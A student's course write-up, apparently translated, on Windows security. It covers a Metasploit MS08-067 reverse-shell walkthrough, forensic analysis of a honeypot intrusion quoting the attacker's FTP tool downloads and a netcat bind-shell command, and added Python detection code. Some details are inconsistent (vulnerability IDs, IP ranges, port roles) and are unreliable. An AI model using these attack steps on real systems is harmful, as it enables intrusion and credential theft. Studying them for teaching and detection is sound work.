"Network Attack and Defense Practice" Week 7 Assignment

20199138 2019-2020-2 "Network Attack and Defense Practice" Week 7 Assignment

Course this assignment belongs to: https://edu.cnblogs.com/campus/besti/19attackdefense
Assignment requirements: https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10612
Goal of this assignment: learn Windows OS security attack and defense
Homework as follows:

1. Practice content

1.1 Basic Framework of Windows Operating System

Windows is divided into an operating system kernel running in the processor's privileged mode and user-space code running in the processor's unprivileged mode.

  • Kernel mode: Windows executive, Windows kernel, device drivers, hardware abstraction layer, and the kernel-side implementation of the Windows windowing and graphical interface.

  • User mode: system support process, environmental subsystem service process, service process, user application software, core subsystem DLL.

  • Windows process and thread management mechanism: The process is regarded as a container when the executable program runs in the Windows system. The thread is used as a specific carrier for instruction execution in the Windows system.

  • Windows memory management mechanism: Virtual memory is divided into system core memory interval and user memory interval. User mode programs cannot directly access the former.

  • Windows file management mechanism: NTFS file system is adopted, and the executable file is in PE format.

  • Windows registry management mechanism: It is a storage warehouse for system global configuration, user and application software configuration information.

  • Windows network mechanism: network card hardware device driver, NDIS library and miniport driver, TDI, network API DLL and TDI client, network application and service process.

1.2 Security architecture and mechanism of Windows operating system

  • Windows security architecture: the SRM (security reference monitor) in the kernel and the LSASS security service in user mode, together with services such as Winlogon/Netlogon and Eventlog, implement identity authentication for subject users, access control for all resource objects, and security auditing of access.
  • Windows identity authentication mechanism: Windows uses the account as the execution environment in which a security subject runs program code; the fundamental role of account rights is to restrict the access of programs running under that account to system resource objects. Windows supports both local and network identity authentication.
  • Windows authorization and access control mechanism: based on the reference monitor model and implemented jointly by the SRM module in the kernel and the user-mode LSASS service; SRM acts as the intermediary when a security subject accesses a target resource, and access is granted according to the configured access control list.
  • Windows security audit mechanism: the system audit policy is defined by the system administrator in the local security policy and determines which events the system records.
  • Other security mechanisms: Windows Security Center, IPsec loading and verification mechanism, EFS encrypting file system, file protection mechanism, and the privacy protection and browser security mechanisms provided by the bundled IE browser, etc.

1.3 Windows remote security attack and defense technology

This includes remote password guessing and cracking attacks, attacks on Windows network services, and attacks on Windows clients and users.

(1) Penetration test attack process for specific targets:

  • Vulnerability scan test: scan the target system to discover whether it has known security vulnerabilities.
  • Find the exploit code for the vulnerability: using the index information in a vulnerability database, locate attack code in the security community for the vulnerabilities that the scan found.
  • Carry out the penetration test: once exploit code is found, the penetration attack can be attempted, but success depends on whether the code matches the target environment.
  • Metasploit penetration testing: Metasploit contains exploit modules that exploit security vulnerabilities, auxiliary modules responsible for scanning and enumeration, payload modules responsible for implanting shellcode (code executed through the software vulnerability) on the target system, encoder modules that help evade detection, nop modules used to pad payloads, and various user interfaces.

(2) Remote password guessing and cracking attacks:

  • Remote password guessing: network services that frequently suffer such attacks include the SMB protocol, the WMI service, the TS remote desktop terminal service, the MS SQL database service, SharePoint, etc.
  • Eavesdropping on and cracking remote password exchanges: Windows needs to exchange information over the network when verifying the identity of network users, so passwords can be cracked by eavesdropping on the password exchange traffic.
  • Prevention of remote penetration attacks: software patches should be applied as soon as possible; while a vulnerability has been announced but not yet patched, access to the affected network services should be temporarily disabled to avoid attack; known vulnerabilities should be monitored with vulnerability scanning software and promptly repaired.

1.4 Windows local security attack and defense technology

  • Windows local privilege escalation: after obtaining restricted user rights on the system, the attacker focuses on obtaining the highest privilege; the main methods are DLL injection and exploiting local program vulnerabilities.

  • Windows sensitive information theft: Windows system password ciphertext extraction, Windows system password cracking, theft of sensitive user information, etc.
    Precautions: choose high-strength passwords, use more secure encryption algorithms, and configure security policies.

  • Windows trace hiding: cover up the intrusion by disabling the audit function and clearing the event log.
    Precautions: set up system auditing and network service auditing in advance, and write log records to non-erasable media such as a CD-ROM.

  • Windows remote control and backdoor programs: use command-line remote control tools, graphical remote control tools, etc. to implant remote control and backdoor programs on the system in order to maintain permanent control of the host.
    Preventive measures: backdoor detection software, anti-virus software, RootkitRevealer, IceSword.

2. Practice process

2.1 Hands-on practice: Metasploit Windows Attack

Task: Use Metasploit software to conduct Windows remote penetration attack experiments, and use Windows Attacker / BT4 attack machine to attempt a remote penetration attack on MS08-067 vulnerability on Windows Metasploitable target machine to obtain access to the target host.

Host                        IP address
Kali attack machine         193.168.200.2
Win2KServer target machine  193.168.200.124

  1. Enter msfconsole in Kali to start Metasploit.
  2. To view detailed information on vulnerability ms08_067, enter search ms08_067; to view usable payloads, enter show payloads.
  3. Use MS03-026 as the target vulnerability of our attack: enter use exploit/windows/smb/ms08_067_netapi.
     Set the payload to open a reverse connection: enter set PAYLOAD generic/shell_reverse_tcp.
     Payloads are divided into singles, stagers and stages; the payload is the code that does the actual work, while the exploit is the delivery system.
     Set the Kali attack machine IP address: enter set LHOST 192.168.200.2. Set the Win2K target machine IP address: enter set RHOST 192.168.200.124.
  4. Start the attack: enter exploit.
  5. A meterpreter prompt is returned, indicating that the attack succeeded. Run the shell command to enter the target machine's system command line. Enter ipconfig to display the target machine's operating system and IP configuration; the penetration attack is successful.
  6. Verify: return to the root directory and create the file ABC; the file ABC can be seen to have been created successfully in the root directory.

2.2 Practice of forensic analysis: decoding a successful NT system cracking attack

An attacker from 213.116.251.162 successfully compromised a honeypot host 172.16.1.106 (host name: lab.wiretrip.net) deployed by rfp; the task is to extract and analyze the entire process of the attack.

1. What cracking tools did the attacker use to attack?

  1. Open the log file in Wireshark and, following the question, filter the data with ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106. The attacker initially made HTTP requests.
  2. Looking further down, in frame 117 the attacker opened the system startup file boot.ini, and the request contains many %C0%AF sequences, which are an (overlong) Unicode encoding of /. This suggests a Unicode directory traversal attack.
  3. Frames 130 and 140 contain msadc, which is the probing stage. Following the TCP stream at frame 149 shows a SQL injection attack (select * from customers where ...).
     The command executed is cmd /c echo werd >> c:\fun. It can be determined that this is an attack on the MSADCS RDS vulnerability.

2. How did the attacker use this cracking tool to enter and control the system?
Enter ip.src == 213.116.251.162 && ip.dst == 172.16.1.106 && http.request.method == "POST" in Wireshark to filter, follow the TCP streams in order, and extract the following commands.

cmd /c echo hacker 2000 >> ftpcom")
cmd /c echo get samdump.dll >> ftpcom")
cmd /c echo get pdump.exe >> ftpcom")
cmd /c echo get nc.exe >> ftpcom")
cmd /c echo quit >> ftpcom")
cmd /c ftp -s:ftpcom -n www.nether.net")

Frame 179, follow TCP stream: the command cmd /c echo user johna2k > ftpcom is seen; the attacker creates the ftpcom script.

Frame 299, follow TCP stream: the attacker tries to connect to the FTP server, without success.

Frame 1106, follow TCP stream: the FTP connection succeeds.

Frame 1224, follow TCP stream: the attacker enters the command cmd1.exe /c nc -l -p 6969 -e cmd1.exe. This means the attacker connected to port 6969 and gained access rights. At this point the attacker has entered the system and gained access.
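To turn the indicators from questions 1 and 2 (overlong %C0%AF traversal, msadc probing, shell commands injected through the RDS query, and the nc listener) into a repeatable check, here is an added detection example. It is not part of the original write-up; the HTTP requests below are constructed to resemble the capture, and the tag names and regular expressions are my own choices.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample requests modelled on the stages seen in the capture:
# boot.ini read via %C0%AF, msadc probe, RDS queries carrying shell commands.
SAMPLE_REQUESTS = [
    ("GET", "/scripts/..%C0%AF..%C0%AFwinnt/boot.ini", ""),
    ("GET", "/msadc/msadcs.dll", ""),
    ("POST", "/msadc/msadcs.dll/AdvancedDataFactory.Query",
     "select * from customers where city='|shell(\"cmd /c echo user johna2k >ftpcom\")|'"),
    ("POST", "/msadc/msadcs.dll/AdvancedDataFactory.Query",
     "select * from customers where city='|shell(\"cmd1.exe /c nc -l -p 6969 -e cmd1.exe\")|'"),
]

# "cmd /c ..." or "cmd1.exe /c ..." up to the closing quote of the shell() call
CMD_RE = re.compile(r"cmd1?(?:\.exe)?\s*/c\s*([^\"')|]+)", re.I)
LISTENER_RE = re.compile(r"\bnc(?:\.exe)?\b.*-l\b.*-e\b", re.I)

def decode_overlong(path):
    """Percent-decode and collapse 2-byte overlong UTF-8 (lead byte C0/C1),
    which old IIS decoded after its path check. Returns (path, overlong_seen)."""
    raw = unquote_to_bytes(path)
    out, seen, i = [], False, 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and raw[i + 1] & 0xC0 == 0x80:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))  # C0 AF -> '/'
            seen, i = True, i + 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out), seen

def classify(method, path, body=""):
    """Return the indicator tags found in one HTTP request (empty if clean)."""
    norm, overlong = decode_overlong(path)
    tags = ["overlong-utf8"] if overlong else []
    if "../" in norm.replace("\\", "/"):
        tags.append("traversal")
    if "msadc" in norm.lower():
        tags.append("msadc-probe")
        m = CMD_RE.search(body) if method == "POST" else None
        if m:
            cmd = m.group(1).strip()
            tags.append("rds-cmd:" + cmd)
            if LISTENER_RE.search(cmd):  # nc -l ... -e cmd: bind-shell backdoor
                tags.append("backdoor-listener")
    return tags
```

Running classify over SAMPLE_REQUESTS reproduces the three stages in order: traversal, msadc probe, and RDS command injection ending in the port-6969 listener.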

3. What did the attacker do after gaining access to the system?

  1. Enter tcp.port == 6969 and follow the TCP stream to discover the attacker's behavior.
  2. The attacker tried to collect information with net session (list sessions), but did not have permission, and then returned to the host list.
  3. The attacker echoed a message into the file README.NOW.Hax0r in the root directory of the C drive.
  4. The attacker ran net group to view the user groups, net localgroup to view the local group users, and net group domain admins, but all failed.
  5. The attacker started looking for the msadc directory and executed pdump to crack the password ciphertext; all failed.
  6. The attacker began to delete samdump and pdump.
  7. ... the attacker left.

4. How can we prevent such attacks?

  • Disable services such as unneeded RDS.
  • The firewall blocks connections initiated by servers inside the network.
  • Set the virtual root directory on a separate file volume for the web server.
  • Use the NTFS file system to reduce the use of FAT that does not provide security features.

5. Do you think the attacker is alert that his target is a honeypot host? If yes, why?
Yes; the attacker left a message of praise.

2.3 Team confrontation practice: Windows system remote penetration attack and analysis

Task:

Attacker: use Metasploit to select a vulnerability on the Metasploitable target for a penetration attack and gain control.
Defense: use tcpdump/wireshark/snort to monitor and capture the network attack packet files, then use wireshark/snort to analyze the attack process and obtain the attacker's IP address, the target IP and port, the attack start time, the vulnerability exploited, the shellcode used, and the commands executed locally after the attack succeeds.

This is the same as the content of practice 2.1, so no further details are given; only the analysis with Wireshark follows.
Open Wireshark to capture, then enter exploit to attack. Filter with:
ip.addr == 192.168.200.124 && ip.addr == 192.168.200.2

The following results can be obtained:
source address 192.168.200.2; target address 192.168.200.124;
source port 4444; target port 445;
attack initiation time: starting from the first ARP request;
vulnerability exploited by the attack: a vulnerability in the SMB network service; the RemoteActivation call seen in the capture shows the exploited RDP vulnerability.
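The defender's side of this practice amounts to correlating two flows: the attacker's SMB session to port 445 and the target's subsequent connection back to the handler port (4444 here) that the reverse_tcp payload opens. The following is an added example of that correlation over flow records; it is not part of the write-up, and the flow list is constructed to resemble the capture described above.

```python
from collections import namedtuple

# First packet of each TCP flow: timestamp (s), source, sport, destination, dport.
Flow = namedtuple("Flow", "ts src sport dst dport")

# Constructed flows resembling the practice capture (not taken from a real pcap).
FLOWS = [
    Flow(0.10, "192.168.200.2", 1041, "192.168.200.124", 445),   # SMB from attacker
    Flow(0.95, "192.168.200.124", 1028, "192.168.200.2", 4444),  # target calls back
    Flow(1.20, "192.168.200.124", 1029, "192.168.200.7", 53),    # unrelated DNS
    Flow(40.0, "192.168.200.9", 1050, "192.168.200.124", 445),   # ordinary share use
]

def find_reverse_shells(flows, window=30.0):
    """Return (smb_flow, callback_flow) pairs where the SMB server opened a new
    connection back to its SMB client within `window` seconds. An SMB server
    normally never initiates a connection to the client that just talked to it."""
    hits = []
    ordered = sorted(flows, key=lambda f: f.ts)
    for i, smb in enumerate(ordered):
        if smb.dport != 445:
            continue
        for later in ordered[i + 1:]:
            if later.ts - smb.ts > window:
                break  # flows are time-ordered, nothing further can match
            if later.src == smb.dst and later.dst == smb.src:
                hits.append((smb, later))
    return hits

def summarize(hit):
    """Format one hit the way the defense report above lists its findings."""
    smb, cb = hit
    return (f"attacker {smb.src} -> {smb.dst}:445 at t={smb.ts:.2f}s; "
            f"callback {cb.src} -> {cb.dst}:{cb.dport} at t={cb.ts:.2f}s")

if __name__ == "__main__":
    for hit in find_reverse_shells(FLOWS):
        print(summarize(hit))
```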

3. Problems encountered in learning and solutions

  • Question 1: when I first started practice 2 (decoding the NT system cracking attack), I found it a bit obscure.
  • Solution to question 1: read books and refer to classmates' blogs.

4. Practice summary

There are too many things, so I will do my homework early next time!

References

Origin www.cnblogs.com/mywlgf/p/12707078.html